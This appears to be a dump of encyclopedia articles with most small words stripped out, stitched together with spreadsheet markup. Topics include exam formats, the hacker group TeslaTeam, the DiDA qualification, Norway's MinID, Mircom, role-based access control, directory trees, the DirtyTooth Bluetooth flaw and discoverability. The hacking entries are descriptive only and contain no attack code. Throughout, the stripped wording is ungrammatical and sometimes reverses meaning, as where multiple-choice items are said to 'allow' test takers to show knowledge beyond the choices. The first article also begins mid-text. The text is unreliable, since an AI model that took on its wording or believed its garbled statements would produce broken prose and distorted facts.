tests. terms administration, multiple-choice questions usually requires less time test takers answer, easy score grade, provide greater coverage material, allows wide range difficulty, easily diagnose test taker's difficulty certain concepts. educational tool, multiple-choice items test many levels learning well test taker's ability integrate information, provides feedback test taker distractors wrong correct answers right. nevertheless, difficulties associated multiple-choice questions. administrative terms, multiple-choice items effective usually take great time construct. educational tool, multiple-choice items allow test takers demonstrate knowledge beyond choices provided even encourage guessing approximation presence least correct answer. instance, test taker might work explicitly 6.14 7.95 48.813 {\displaystyle 6.14\cdot 7.95=48.813} knowing {\displaystyle 6\cdot 8=48} would choose answer close moreover, test takers misinterpret items process, perceive items tricky picky. finally, multiple-choice items test test taker's attitudes towards learning correct responses easily faked. alternative response true/false questions present candidates binary choice statement either true false. this method presents problems, depending number questions, significant number candidates could 100% guesswork, average 50%. matching type matching item item provides defined term requires test taker match identifying characteristics correct term. completion type fill-in-the-blank item provides test taker identifying characteristics requires test taker recall correct term. there types fill-in-the-blank tests. easier version provides word bank possible words fill blanks. exams words word bank used exactly once. teacher wanted create test medium difficulty, would provide test word bank, words used others all. hardest variety test fill-in-the-blank test word bank provided all. this generally requires higher level understanding memory multiple-choice test. because this, fill-in-the-blank tests[with word bank] often feared students. essay items short answer essay typically require test taker write response fulfill requirements item. administrative terms, essay items take less time construct. assessment tool, essay items test complex learning objectives well processes used answer question. items also provide realistic generalizable task test. finally, items make difficult test takers guess correct answers require test takers demonstrate writing skills well correct spelling grammar. difficulties essay items primarily administrative: example, test takers require adequate time able compose answers. when questions answered, answers usually poorly written test takers time organize proofread answers. turn, takes time score grade items. when items scored graded, grading process becomes subjective non-test related information influence process. thus, considerable effort required minimize subjectivity grading process. finally, assessment tool, essay questions potentially unreliable assessing entire content subject matter. instructions exam takers rely command words direct examinee respond particular way, example describing defining concept, comparing contrasting scenarios events. ofqual maintains official list command words explaining meaning. quizzes quiz brief assessment cover small amount material given class. some cover three lectures given period times reading section given exercise important part class summarize. however, simple quiz usually count much, instructors usually provide type test formative assessment help determine whether student learning material. addition, time instructor collected make significant part final course grade. mathematical questions most mathematics questions, calculation questions subjects chemistry, physics, economics employ style fall categories, although papers, notably maths challenge papers united kingdom employ multiple choice. instead, mathematics questions state mathematical problem exercise requires student write freehand response. marks given steps taken correct answer. question multiple parts, later parts answers previous sections, marks granted earlier incorrect answer used correct method followed, answer correct (given incorrect input) returned. higher-level mathematical papers include variations true/false, candidate given statement asked verify validity direct proof stating counterexample. open-book tests though popular closed-book test, open-book open-note) tests slowly rising popularity. open-book test allows test taker access textbooks notes taking test. questions asked open-book exams typically thought provoking intellectual questions closed-book exam. rather testing facts test takers know, open-book exams force apply facts broader question. main benefit seen open-book tests better preparation real world memorize anything need disposal. oral tests oral test test answered orally (verbally). teacher oral test assessor verbally question student, answer using words. physical fitness tests physical fitness test test designed measure physical strength, agility, endurance. they commonly employed educational institutions part physical education curriculum, medicine part diagnostic testing, eligibility requirements fields focus physical ability military police. throughout 20th century, scientific evidence emerged demonstrating usefulness strength training aerobic exercise maintaining overall health, agencies began incorporate standardized fitness testing. united states, president's council youth fitness established 1956 encourage monitor fitness schoolchildren. common tests include timed running multi-stage fitness test (commonly known "beep test"), numbers push-ups, sit-ups/abdominal crunches, pull-ups individual perform. more specialised tests used test ability perform particular role. many gyms, private organisations event organizers fitness tests. using military techniques developed british army modern test like illinois agility cooper test.stop watch timing norm recent years hand timing proven inaccurate inconsistent. electronic timing norm order promote accuracy consistency, lessen bias. performance tests performance test assessment requires examinee actually perform task activity, rather simply answering questions referring specific parts. purpose ensure greater fidelity tested. example behind-the-wheel driving test obtain driver's license. rather answering simple multiple-choice items regarding driving automobile, student required actually drive evaluated. performance tests commonly used workplace professional applications, professional certification licensure. when used personnel selection, tests might referred work sample. licensure example would cosmetologists required demonstrate haircut manicure live person. group–bourdon test number psychometric tests trainee train drivers required pass.some performance tests simulations. instance, assessment become certified ophthalmic technician includes components, multiple-choice examination computerized skill simulation. examinee must demonstrate ability complete seven tasks commonly performed job, retinoscopy, simulated computer. preparations from perspective test developer, great variability respect time effort needed prepare test. likewise, perspective test taker, also great variability respect time needed obtain desired grade score given test. when test developer constructs test, amount time effort dependent upon significance test itself, proficiency test taker, format test, class size, deadline test, experience test developer. process test construction aided several ways. one, many test developers students time, therefore able modify outright adopt questions previous tests. countries, book publishers often provide teaching packages include test banks university instructors adopt published books courses. these test banks contain four thousand sample test questions peer-reviewed time-tested. instructor chooses testbank would select fixed number test questions test bank construct test. test constructions, time needed test taker prepare test dependent upon frequency test, test developer, significance test. general, nonstandardized tests short, frequent, constitute major portion test taker's overall course grade score require test taker spend much time preparing test. conversely, nonstandardized tests long, infrequent, constitute major portion test taker's overall course grade score usually require test taker spend great amounts time preparing test. prepare nonstandardized test, test takers rely upon reference books, class lecture notes, internet, past experience. test takers also various learning aids study tests flashcards mnemonics. test takers even hire tutors coach process increase probability obtaining desired test grade score. countries united kingdom, demand private tuition increased significantly recent years. finally, test takers rely upon past copies test previous years semesters study future test. these past tests provided friend group copies previous tests instructors institutions, test provider (such examination board) itself.unlike nonstandardized test, time needed test takers prepare standardized tests less variable usually considerable. this standardized tests usually uniform scope, format, difficulty often important consequences respect test taker's future test taker's eligibility attend specific university program enter desired profession. unusual test takers prepare standardized tests relying upon commercially available books provide in-depth coverage standardized test compilations previous tests (e.g., year series singapore). many countries, test takers even enroll test preparation centers cram schools provide extensive supplementary instructions test takers help better prepare standardized test. hong kong, suggested tutors running centers celebrities right. this private tuition popular career choice graduates developed economies. finally, countries, instructors institutions also played significant role preparing test takers standardized test. cheating cheating test process using unauthorized means methods purpose obtaining desired test score grade. this range bringing using notes closed book examination, copying another test taker's answer choice answers individual test, sending paid proxy take test.several common methods employed combat cheating. they include multiple proctors invigilators testing period monitor test takers. test developers construct multiple variants test administered different test takers time, write tests multiple-choice options, based theory fully worked answers difficult imitate. cases, instructors administer tests leave task instructors invigilators, mean invigilators know candidates, thus form identification required. finally, instructors test providers compare answers suspected cheaters test determine whether cheating occur. other types tests related terms ordinary exam: exam taken corresponding course; sufficiency exam examination credit: exam taken getting official credits academic institution; revalidation exam equivalence exam: offering value exam previously taken another institution; extraordinary exam: exam taken period ordinary exams corresponding course. also international examinations abitur used germany. gcse a-level—used except scotland. international baccalaureate diploma programme international examination international general certificate secondary education (igcse) international examinations junior certificate leaving certificate republic ireland. matura/maturita used austria, bosnia herzegovina, bulgaria, croatia, czech republic, italy, liechtenstein, hungary, montenegro, north macedonia, poland, serbia, slovenia, switzerland, ukraine; previously used albania. nationella prov used sweden national higher grade, advanced higher used scotland uttar pradesh subordinate services selection commission organization authorized conduct examinations uttar pradesh state india references bibliography bary, william theodore, (1960) sources chinese tradition: volume (new york: columbia university press). isbn 978-0-231-10939-0. bol, peter (2008), neo-confucianism history chaffee, john (1995), thorny gates learning sung [song] china, state university york press christie, anthony (1968). chinese mythology. feltham: hamlyn publishing. isbn 0600006379. ch'ü, t'ung-tsu (1967 [1957]). "chinese class structure ideology", chinese thoughts institutions, john fairbank, editor. chicago london: university chicago press. crossley, pamela kyle (1997). manchus. cambridge, mass.: blackwell. isbn 1557865604. elman, benjamin (2002), cultural</t>
  </si>
  <si>
    <t>TeslaTeam</t>
  </si>
  <si>
    <t>teslateam group computer hackers. using denial service attacks, defacement, methods, mainly targets political groups albanian websites, including news organizations human rights groups. teslateam currently virtual army serbia openly launch cyber attacks. targets teslateam mainly targets websites political organisations, ngos, websites anti-serb organisations. attacks teslateam's attacks began february 2013, demonstration introduction cyrillic alphabet serbian language vukovar. they began operation cirilica defacement security breaches websites across croatia. timeline notable defacements february 2013: vukovar institute peace research education february 2013: polytechnic lavoslav ružička vukovar february 2013: croatian bishops' conference february 2013: university osijek february 2013: croatian pure party rights august 2013: montenegro sites defaced october 2013: website librazhd municipality albania december 2013: croatian websites defaced timeline notable security breaches november 2012: teslateam claimed hacked website ministry economy, trade energy albania november 2013: teslateam claimed hacked website chicago tribune november 2013: teslateam claimed hacked database vevo november 2013: teslateam claimed hacked website news november 2013: websites bulgarian albanian government november 2013: cambridge university database hacked december 2013: court bosnia herzegovina references external links</t>
  </si>
  <si>
    <t>Diploma in Digital Applications (DiDA)</t>
  </si>
  <si>
    <t>england, wales northern ireland, diploma digital applications (dida) optional information communication technology (ict) course, usually studied stage equivalent school students (aged 14-16). dida introduced 2005 (after pilot starting 2004) creation edexcel examination board. dida notable consists entirely coursework, completed on-computer; work relating dida course created, stored, assessed moderated digitally. introduced replacement plug education gnvqs withdrawn. course there particular 'levels' taken: level (grades c-g) level (grades course consists five units. using compulsory unit. four units, multimedia, graphics, enterprise computer games authoring. students complete using module alone receive award digital applications (aida), equivalent gcse standard grade. those complete using unit four units receive certificate digital applications (cida), equivalent gcses standard grades. students complete four modules receive full diploma digital applications (dida), equivalent four gcses standard grades. edexcel also made possible candidates achieve certificate digital applications plus (cida+), equivalent three gcses standard grades, upon completion using another units. each module stated take approximately guided learning hours complete. pupils completing module dida course reading online resource (see external links) independently completing number tasks. these tasks, well planning design work, presented 'eportfolio' marked assessed. only work presented computer marked. edexcel maintains archive previous modules (known summative project briefs, simply spbs) online, candidates opportunity practice working meet requirements course, teachers practice leading course. levelling qualifications dida students five grades. these are: fail, pass, credit, merit distinction levels two. games authoring module addition september 2009 summative project briefs. adobe associate certificates students successfully complete dida units d202 d203 eligible claim adobe associate certification. adobe launched suite adobe certified associate qualifications, examinations managed certiport. students eligible claim adobe systems associate certificate(s) (formerly known macromedia certificates, adobe purchased macromedia) achieve merit distinction relevant unit level complete adobe associate certificate tasks, using relevant adobe software, part summative project briefs following units: media using dreamweaver multimedia multimedia using flash multimedia graphics using fireworks graphicsthis scheme cancelled, leaving many unhappy students without extra qualifications, however alternative provided certiport edexcel, much work. alternative adobe matchware dida suite (openmind, mediator screencorder endorsed edexcel. students create eportfolios advanced multimedia projects appropriate d201 d202. references external links edexcel: dida dida (using 2006) dida (multimedia 2006) http://www1.edexcel.org.uk/d203_spb_0911_final/html/spb203index.htm (graphics 2011)] dida (ict enterprise 2006) dida eportfolio-builder website dedicated dida course requirements adobe certification</t>
  </si>
  <si>
    <t>MinID</t>
  </si>
  <si>
    <t>minid electronic login system used secure range internet services norwegian public sector. communication done minid encrypted secure information unauthorized usage. everyone registered norwegian population register years create public minid. april 2010, million people living norway created user accounts minid. create public pin-codes norwegian administration needed. purpose purpose minid communicate electronic identity, users authorized electronic services, secure way. minid user database social security numbers pin-codes saved. minid used access online services various norwegian public agencies, including norwegian labour welfare administration, directorate taxes state educational loan. controller agency public management e-government (difi) controller personal data handled minid. agency public management egovernment (norwegian: direktoratet forvaltning informasjons- kommunikasjonsteknologi) difi government agency subordinate norwegian ministry government administration reform. responsible help public sector achieve quality, efficiency, user friendliness, openness participation, well helping public sector organized good good intersectoral cooperation. user profile users minid user profile contains mobile phone number and/or e-mail address. this data used administrate minid use. e-mail address needed order send user temporary password forgets password. phone number needed order send sms-code temporary password user forgets password. transparency, correction deletion according users claim full access handling personal data. users also right information data handled saved, correct delete inaccurate data. users time choose delete user minid. user profile deleted minid user database. extradition others minid passes user's social security number chosen language public services logs user public services without login. also egovernment europe references</t>
  </si>
  <si>
    <t>Mircom</t>
  </si>
  <si>
    <t>mircom technologies ltd. manufacturer distributor life safety communications systems including fire detection alarm, voice evacuation, controlled access security solutions. company headquartered vaughan, ontario, canada. history mirtone mirtone founded manuel mira early 1960s. company started manufacturing apartment intercoms toronto. company expanded started producing fire alarm systems became largest fire alarm manufacturer canada. mirtone bought general signal 1988. mircom mircom founded 1991 tony falbo ontario. 1998 company launched fa-1000 series alarm control panel followed tas-2000 fx-2000 2000. 2003, company relocated current 82,000 (7,600 headquarters vaughan, ontario. 2004, company launched international sales department acquired secutron simplexgrinnell, part tyco international. 2005, company acquired pro-2000 product line securiplex inc. 2006, company become 9000 certified launched summit systems technologies. 2007, company opened office india. 2008, company expanded opening united states warehouse facility niagara falls, york opening sales office angeles. year, company opened branches alberta british columbia. 2011, company acquired kost fire safety limited british columbia, murray electronics inc. ontario opened office near vancouver. 2016, company released qx-mini acquired durham central fire systems. brands mircom mircom principal brand. product line split fire alarm, communications, security automation systems. secutron secutron manufacturing fire alarm systems since 1973, including conventional intelligent fire alarm control panels, fire alarm networks, fire security integration systems, fire alarm accessories. secutron products approved underwriters laboratories (ul), factory mutual (fm), california state fire marshal (csfm), city york (mea), coast guard, loss prevention certification board (lpcb) american bureau shipping (abs). summit summit systems technology global brand focused requirements voltage system installers electrical contractors. operations mircom group companies headquartered vaughan, ontario, canada, regional offices located niagara falls, york, usa; mexico city, mexico; buenos aires, argentina; bangalore, india; dubai, uae; singapore. mircom employs people worldwide. north american operations mircom operates dedicated network sales service branch offices mircom engineered systems service brand across north america. mircom's headquarters located niagara falls, york. canadian branch locations victoria, maple ridge, (vancouver, kelowna, calgary, edmonton, london, vaughan, ottawa, montreal, quebec, halifax, moncton, american branch locations angeles, chicago, niagara falls, raleigh-durham, miami, cedar grove, international operations systems international limited supports sale installation mircom systems countries worldwide, regional offices located bangalore, india dubai, uae. under u.e.c. (united export) service brand, mircom distributes range fire protection equipment international markets. international branch locations mexico city, mexico buenos aires, argentina bangalore, india dubai, riyadh, saudi arabia singapore, singapore also fire alarm system sensor fire alarm control panel manual pull station emergency communication system references</t>
  </si>
  <si>
    <t>Role hierarchy</t>
  </si>
  <si>
    <t>role based access control, role hierarchy defines inheritance relationship among roles. example, role structure bank treat employees members ‘employee’ role. above roles ‘department manager’, ‘accountant’, inherit permissions ‘employee’ role, ‘department manager’ could ‘savings manager’, ‘loan manager’. rbac models generally treat role hierarchy either tree (set theory), 1992 rbac model ferraiolo kuhn (fk), partially ordered 1996 rbac framework sandhu, coyne, feinstein, youman (scfy). object oriented programming terms, tree role hierarchy single inheritance, partial hierarchy allows multiple when treated partial order, role hierarchy example given could extended role ‘branch manager’ inherit permissions ‘savings manager’, ‘loan manager’, ‘accountant’. complications arise constraints separation duties exist roles. separation duty used prohibit personnel holding ‘loan manager’ ‘accountant’ roles, ‘branch manager’ could inherit permissions them. nist rbac model, unified scfy models, treats role hierarchy partial order, although rbac products gone beyond tree structured hierarchy.</t>
  </si>
  <si>
    <t>Role-based access control</t>
  </si>
  <si>
    <t>computer systems security, role-based access control (rbac) role-based security approach restricting system access authorized users. approach implement mandatory access control (mac) discretionary access control (dac). role-based access control (rbac) policy-neutral access-control mechanism defined around roles privileges. components rbac role-permissions, user-role role-role relationships make simple perform user assignments. study nist demonstrated rbac addresses many needs commercial government organizations. rbac used facilitate administration security large organizations hundreds users thousands permissions. although rbac different access control frameworks, enforce policies without complication. design within organization, roles created various functions. permissions perform certain operations assigned specific roles. members staff system users) assigned particular roles, role assignments acquire permissions needed perform particular system functions. since users assigned permissions directly, acquire role roles), management individual user rights becomes matter simply assigning appropriate roles user's account; simplifies common operations, adding user, changing user's department. role based access control interference relatively issue security applications, multiple user accounts dynamic access levels lead encryption instability, allowing outside user exploit weakness unauthorized access. sharing applications within dynamic virtualized environments shown success addressing problem.three primary rules defined rbac: role assignment: subject exercise permission subject selected assigned role. role authorization: subject's active role must authorized subject. with rule above, rule ensures users take roles authorized. permission authorization: subject exercise permission permission authorized subject's active role. with rules rule ensures users exercise permissions authorized.additional constraints applied well, roles combined hierarchy higher-level roles subsume permissions owned sub-roles. with concepts role hierarchy constraints, control rbac create simulate lattice-based access control (lbac). thus rbac considered superset lbac. when defining rbac model, following conventions useful: subject person automated agent role function title defines authority level permissions approval mode access resource session mapping involving and/or subject assignment permission assignment partially ordered role hierarchy. also written: (the notation: means inherits permissions subject multiple roles. role multiple subjects. role many permissions. permission assigned many roles. operation assigned many permissions. permission assigned many operations.a constraint places restrictive rule potential inheritance permissions opposing roles, thus used achieve appropriate separation duties. example, person allowed create login account authorize account creation. thus, using theory notation: {\displaystyle pa\subseteq p\times many many permission role assignment relation. {\displaystyle sa\subseteq s\times many many subject role assignment relation. {\displaystyle rh\subseteq r\times subject multiple simultaneous sessions with/in different roles. standardized levels nist/ansi/incits rbac standard (2004) recognizes three levels rbac: core rbac hierarchical rbac, adds support inheritance roles constrained rbac, adds separation duties relation models rbac flexible access control technology whose flexibility allows implement mac. groups (e.g., implemented posix file systems) emulate rbac. simulate rbac role graph restricted tree rather partially ordered set.prior development rbac, bell-lapadula (blp) model synonymous file system permissions synonymous dac. these considered known models access control: model blp, considered model, vice versa. research late 1990s demonstrated rbac falls neither category. unlike context-based access control (cbac), rbac look message context (such connection's source). rbac also criticized leading role explosion, problem large enterprise systems require access control finer granularity rbac provide roles inherently assigned operations data types. resemblance cbac, entity-relationship based access control (erbac, although acronym also used modified rbac systems, extended role-based access control) system able secure instances data considering association executing subject. comparing access control lists (acls) used traditional discretionary access-control systems affect low-level data-objects. rbac differs assigning permissions operations change direct-relations several entities (see: aclg below). example, could used granting denying write access particular system file, dictate file could changed. rbac-based system, operation might 'create credit account' transaction financial application 'populate blood sugar level test' record medical application. role thus sequence operations within larger activity. rbac shown particularly well suited separation duties (sod) requirements, ensure people must involved authorizing critical operations. necessary sufficient conditions safety rbac analyzed. underlying principle individual able effect breach security dual privilege. extension, person hold role exercises audit, control review authority another, concurrently held role.then again, "minimal rbac model", rbacm, compared mechanism, aclg, groups permitted entries acl. barkley (1997) showed rbacm aclg equivalent. modern implementations, like cakephp framework, acls also manage groups inheritance hierarchy groups. under aspect, specific "modern acl" implementations compared specific "modern rbac" implementations, better "old (file system) implementations". data interchange, "high level comparisons", data translated xacml. attribute-based access control attribute-based access control abac model evolves rbac consider additional attributes addition roles groups. abac, possible attributes user e.g. citizenship, clearance, resource e.g. classification, department, owner, action, context e.g. time, location, ip.abac policy-based sense uses policies rather static permissions define allowed allowed. availability rbac manage user privileges (computer permissions) within single system application widely accepted best practice. 2010 report prepared nist research triangle institute analyzed economic value rbac enterprises, estimated benefits employee reduced employee downtime, efficient provisioning, efficient access control policy administration.in organization heterogeneous infrastructure requirements span dozens hundreds systems applications, using rbac manage sufficient roles assign adequate role memberships becomes extremely complex without hierarchical creation roles privilege assignments. newer systems extend older nist rbac model address limitations rbac enterprise-wide deployments. nist model adopted standard incits ansi/incits 359-2004. discussion design choices nist model also published. also references further reading david ferraiolo; richard kuhn; ramaswamy chandramouli (2007). role-based access control (2nd ed.). artech house. isbn 978-1-59693-113-8. external links rbac models standards role based access controls nist xacml core hierarchical role based access control profile institute cyber security university texas antonio practical experiences implementing rbac</t>
  </si>
  <si>
    <t>Temporary fencing</t>
  </si>
  <si>
    <t>temporary fencing free standing, self-supporting fence panel. panels held together couplers interlock panels together making portable flexible wide range applications. common type temporary fencing heras fencing. fence panels supported counter-weighted feet, wide variety accessories including gates, handrails, feet bracing depending application. fence panels commonly constructed either chain link weld mesh. temporary fencing alternative permanent counterpart fence required interim basis needed storage, public safety security, crowd control, theft deterrence. also known construction hoarding used construction sites. other uses temporary fencing include venue division large events public restriction industrial construction sites, guardrails often used. temporary fencing also often seen special outdoor events, parking lots, emergency/disaster relief sites. offers benefits affordability flexibility. common forms temporary fencing include variety plastic fencing panels constructed chainlink, steel wire. fencing commonly consists individual panels around perimeter desired area fenced plastic temporary fencing used english cricket games since 2001 form crowd control. also crowd control barriers vinyl fence references</t>
  </si>
  <si>
    <t>Directory information tree</t>
  </si>
  <si>
    <t>directory information tree (dit) data represented hierarchical tree-like structure consisting distinguished names (dns) directory service entries. both x.500 protocols lightweight directory access protocol (ldap) directory information trees fundamental data structure. typically, x.500 ldap deployment single organization directory information tree consists parts: level name structure name organization representation data model structure within organization level naming level directory information tree frequently represent political geographic divisions. original assumption x.500 directory servers would interconnected form single, global namespace. entries level tree corresponded countries, identified 3166 letter country code. entries subordinate country's entry would correspond states provinces, national organizations. naming system particular country determined country's national standards body telecommunications provider. limitation original directory information tree structure assumption applications searching entry particular organization would navigate directory tree first browsing particular country organization based, region organization based, locate entry organization itself, search within organization entry question. desire support searching broadly individual person particulars person's location organization known experiments directory deployment interconnection, common indexing protocol. today, ldap deployments, particular active directory deployments, interconnected single global naming space, national country codes basis naming. instead, deployments follow directory structure level mirrors domain name system, described 2247. example, entry organization domain name "example.com" would distinguished name "dc=example, dc=com", entries organization's directory information tree would contain distinguished name suffix. organizational structure elements organization represented directory (e.g., people, roles, devices) modeled variety techniques. determining factors include: requirements applications searching updating directory requirement provide unique name entry desire stability directory structure desire human-readability distinguished names entries directory ease importing data directory existing databases directoriesearly deployments x.500 within corporations institutions entries representing employees organizations often used structure mirrored organizational structure, organizational unit entries corresponding departments divisions organization. relative distinguished names entries employees often formed common names individual employees. example early x.500/ldap deployment might "cn=joe bloggs, ou=marketing, ou=operations, o=example corporation, st=ca, c=us". disadvantage approach organizational structure changed, employees change legal name, require moving renaming entries directory, adds complexity overhead also upset applications designed deal gracefully moves. today, many large deployments x.500 ldap single, flat namespace entries, choose name entries individuals based relative distinguished name organizationally-assigned identifier, username employee number. today, might resemble "uid=00003,ou=people, dc=example, dc=com". advantage structure entries need moved even employees change name, transferred different departments. these changes effected attribute modification, applications using unique identifier (e.g. database) need touched.</t>
  </si>
  <si>
    <t>DirtyTooth</t>
  </si>
  <si>
    <t>dirtytooth generic term feature bluetooth profiles iphone exploited device using version 11.2. android devices affected. history first hack reported march 2017 officially presented public rootedcon conference august 2017 madrid, spain later toorcon diego. research paper published 2017 using dirtytooth real bluetooth speaker. blackhat europe 2017 another demonstration carried out, time raspberry overview dirtytooth based bluetooth notifies user changes profile. some operating systems user accept profile change others like ios, warn user, changing automatically profile another. depending bluetooth profile, provide different access levels services information located device. dirtytooth hack works impersonating a2dp profile user's device connects, changing pbap profile pairing without enter device bluetooth version higher. affected hardware hack affected every iphone given smartphones running operating system version 11.2. impact data obtained exploiting dirtytooth hack include personal technical information user device. mitigation this hack resolved updating iphone version 11.2 higher. references external links official website exploit database dirtytooth raspberry</t>
  </si>
  <si>
    <t>Disaster Kleenup International</t>
  </si>
  <si>
    <t>(disaster kleenup international) claims largest organization north america contracts disaster restoration. june 2013, annual revenue $1.7 billion. organization began franchising 1994. organization operates network supports member companies, operate independent contractors. member companies organization provides brand marketing purposes, workshops training programs, claims support, marketing initiatives. also operates 24-hour call center used member companies, customers insurance companies.disaster kleenup international (canada) ltd. operates canada. campbell operates campbell builders, inc., existent columbus, ohio years. utah disaster kleenup largest restoration firm state utah, based draper, utah, 1996 significantly increased plant size equipment base, along increasing work force 29%. references further reading christensen, doug (june 1982). "job nobody wants? disaster kleenup". deseret news. retrieved 2013-04-14. oberbeck, steven (may 1995). "utah disaster-relief firm really cleans electronic equipment". salt lake tribune. retrieved 2013-04-14. (subscription required) "mess-busters tackle cleanup fire". idaho statesman. august 2008. retrieved 2013-04-14. (subscription required) "executive focus: mark dennis (denny) jensen". deseret news. april 1995. retrieved 2013-04-14. (subscription required) "dki backs efforts southeast asia". insurance journal. december 2004. retrieved 2013-04-14. "cleanup firm focuses restoring". deseret news. june 2003. retrieved 2013-04-14. (subscription required) "utah disaster kleenup restore shadowbrook units". deseret news. june 1995. retrieved 2013-04-14. (subscription required) "disaster cleanup firm helps restore fire-affected homes boise". idaho business review. september 2008. retrieved 2013-04-14. (subscription required) "what qualifies disaster? 'when happens you'". salt lake tribune. february 1993. retrieved 2013-04-14. (subscription required) sahm, phil (december 1999). "xmas cards more than sentiments". salt lake tribune. retrieved 2013-04-14. (subscription required) external links official website</t>
  </si>
  <si>
    <t>Discoverability</t>
  </si>
  <si>
    <t>discoverability degree something, especially piece content information, found search file, database, information system. discoverability concern library information science, many aspects digital media, software development, marketing, since products services cannot used people cannot find understand used for. metadata, "information information," book's title, product's description, website's keywords, affects discoverable something database online. adding metadata product available online make easier users find product. example, song file made available online, making title, name band, genre, year release, pertinent information available connection song means file retrieved easily. organizing information putting alphabetical order including search engine example improve discoverability. discoverability related different from, accessibility usability, qualities affect usefulness piece information. etymology concept "discoverability" information science online context loose borrowing concept similar name legal profession. law, "discovery" pre-trial procedure lawsuit party, civil procedure, obtain evidence party parties means discovery devices request answers interrogatories, request production documents, request admissions depositions. discovery obtained non-parties using subpoenas. when discovery request objected requesting party seek assistance court filing motion compel discovery. purpose usability piece information directly relates discoverable either "walled garden" database open internet. quality information available database internet depends upon quality meta-information item, product, service. case service, emphasis placed service reusability, opportunities exist reuse service. however, reuse possible information discoverable first place. make items, products, services discoverable, process follows: document information item, product service (the metadata) consistent manner. store documented information (metadata) searchable repository. technically human-searchable repository, printed paper list would qualify, "searchable repository" usually taken mean computer-searchable repository, database human user search using type search engine "find" feature. enable search documented information efficient manner. supports number reading printed paper list hand might feasible theoretical sense, time cost-efficient comparison computer-based searching.apart increasing reuse potential services, discoverability also required avoid development solution logic already contained existing service. design services discoverable also provide interpretable information capabilities, service discoverability principle provides guidelines could applied service-oriented analysis phase service delivery process. specific digital media relation audiovisual content, according meaning given canadian radio-television telecommunications commission (crtc) purpose 2016 discoverability summit, discoverability summed intrinsic ability given content "stand lot", position easily found discovered. piece audiovisual content movie, series, music, book (ebook), audio book podcast. when audiovisual content digital file show, movie, song, made available online, content "tagged" identifying information names artists (e.g., actors, directors screenwriters shows movies; singers, musicians record producers songs) genres (for movies genres, music genres, etc.). when users interact online content, algorithms typically determine types content user interested computer program suggests "more like this", content user interested different websites systems different algorithms, approach, used amazon (company) online store, indicate user: "customers bought also bought (affinity analysis, collaborative filtering). this example oriented around online purchasing behaviour, algorithm could also programmed provide suggestions based factors (e.g., searching, viewing, etc.). discoverability typically referred connection search engines. highly "discoverable" piece content would appear top, near user's search results. related concept role "recommendation engines", give user recommendations based his/her previous online activity. discoverability applies computers devices access internet, including various console video game systems mobile devices tablets smartphones. when producers make effort promote content (e.g., show, film, song, video game), traditional marketing (billboards, ads, radio ads) digital (pop-up ads, pre-roll ads, etc.), traditional digital marketing. even user's intervention searching certain content type content, discoverability prime factor contributes whether piece audiovisual content likely found various digital modes content consumption. 2017, modes searching include looking netflix movies, spotify music, audible audio books, etc., although concept also generally applied content found twitter, tumblr, instagram websites. involves content's mere presence given platform; involve associating content "keywords" (tags), search algorithms, positioning within different categories, metadata, etc. thus, discoverability enables much promotes. audiovisual content broadcast streamed digital media using internet, discoverability includes underlying concepts information science programming architecture, foundation search specific product, information content. applications within webpage within specific webpage software application ("app"), discoverability feature, content link depends range factors, including size, colour, highlighting features, position within page. when colour used communicate importance feature link, designers typically elements well, shadows bolding, individuals cannot certain colours. just traditional paper printing created physical locations stood out, "above fold" newspaper versus "below fold", page app's screenview certain locations give features additional visibility users, right bottom page screen. positional advantages disadvantages various locations depend different cultures languages (e.g., left right right left). some locations become established, toolbars screen webpage. some designers argued commonly used features (e.g., print button) much visually prominent rarely used features. some features cannot seen, convention user places mouse cursor certain area, toolbar function option become visible. general, smaller screen mobile devices, controls often placed right centre screen, user views content text. some organizations increase discoverability certain feature adding animation, moving "click here" icon. 2017, addition motion sensors geotracking mobile devices made webpage design discoverability complex, smartphones tablets typically capable many inputs user 1980s desktop, including "swiping" touchscreen, touching images screen, tilting device. challenges webpage design degree sophistication experience users navigating webpage environment varies great deal, individuals using applications extreme experienced computer users. internet search items searched online, goal discoverability near search results. organizations make efforts make likely "their" content webpages top, close top, search results; approaches often collectively called search engine optimization (seo). note organization takes action increase website, normally involve changes search engine itself; rather, involves adding metadata tags original content, among strategies, increase "visibility" website search engine algorithms. services service delivery context, application principle requires collecting information service service analysis phase phase; maximum information available service's functional context capabilities service. stage, domain knowledge business experts could also enlisted document meta-data service. service-oriented design phase, already gathered meta-data could made part service contract. oasis soa-rm standard specifies service description artifact represents service meta-data.to make service meta-data accessible interested parties, must centrally accessible. this could either done publishing service-meta dedicated 'service registry' simply placing information 'shared directory'. case 'service registry', repository also used include qos, current state service. voice user interfaces voice user interfaces discoverability users aware commands able say, interfaces display list available commands help users find them. metadata types functional this basic type meta-information expresses functional context service details product, content, service's capabilities. application standardized service contract principle helps create basic functional meta-data consistent manner. standardization applied meta-information outside technical contract service e.g. publishing information service registry.for general items, data might used categorize include: name product, content service (for audiovisual content, would song name, show/movie title) name manufacturer, designer, creators (for audiovisual content, would names director/producer/artists) technical data (size, weight, height physical items, case digital files, compression approach, file size) items identify location embedded sensors (such internet things geolocation data), location use/access) quality service services, know service behavior limitations, user experience, information needs documented within service registry. this potential consumers meta-information comparing performance requirements. considerations services effective application design principle requires meta-information recorded service needs consistent meaningful. this possible organization-wide standards exist enforce service developers record required meta-data consistent way. information recorded meta-data service needs presented technical non-technical experts understand purpose capabilities service, evaluation service required business people service authorized used. this principle best applied service-oriented analysis phase time, details service's purpose functionality available. although service design principles support positive manner, however, case service abstraction service discoverability principle, exists inversely proportional relationship. this details service hidden away service consumers, less discoverable information available discovering service. this could addressed carefully recording service meta-information inner workings service documented within meta-information. algorithms online economy, sophisticated algorithms required analysis ways users search for, access different content products online. thus, metadata created regarding content product, also data specific users' interaction content. social media website user profile given person, indicating demographic information (age, gender, location residence, employment status, education, etc.), website collect analyse information tendencies preferences given user subcategory users. this raises potential privacy concerns. algorithms called “black boxes”, factors used leading websites algorithms typically proprietary information released public. while number search engine optimization (seo) firms offer services attempting increase ranking client's content website, firms typically know exact algorithms used google facebook. crawlers access online content "...by recrawling constant fraction entire web".one concern raised increasing role algorithms search engines databases creation filter bubbles. give practical example, person searches comedy movies online, search engine algorithm start mainly recommending comedies user, showing range films (e.g., drama, documentary, etc.). positive side, person likes comedy films, restricted "filter" reduce information load scanning vast numbers films. however, various cultural stakeholders raised concerns filter algorithms restrict diversity material discoverable users. concerns dangers "filter bubbles" raised regards online news services, provide types news, news sources, topics user based his/her previous online activities. thus person previously searched content mainly shown content person previously searched content shown search results, this could lead news readers becoming aware certain news source's viewpoints. search behaviour video content viewers changed great deal increasing popularity video sharing websites video streaming. whereas typical show consumer 1980s would read print edition guide find shows click 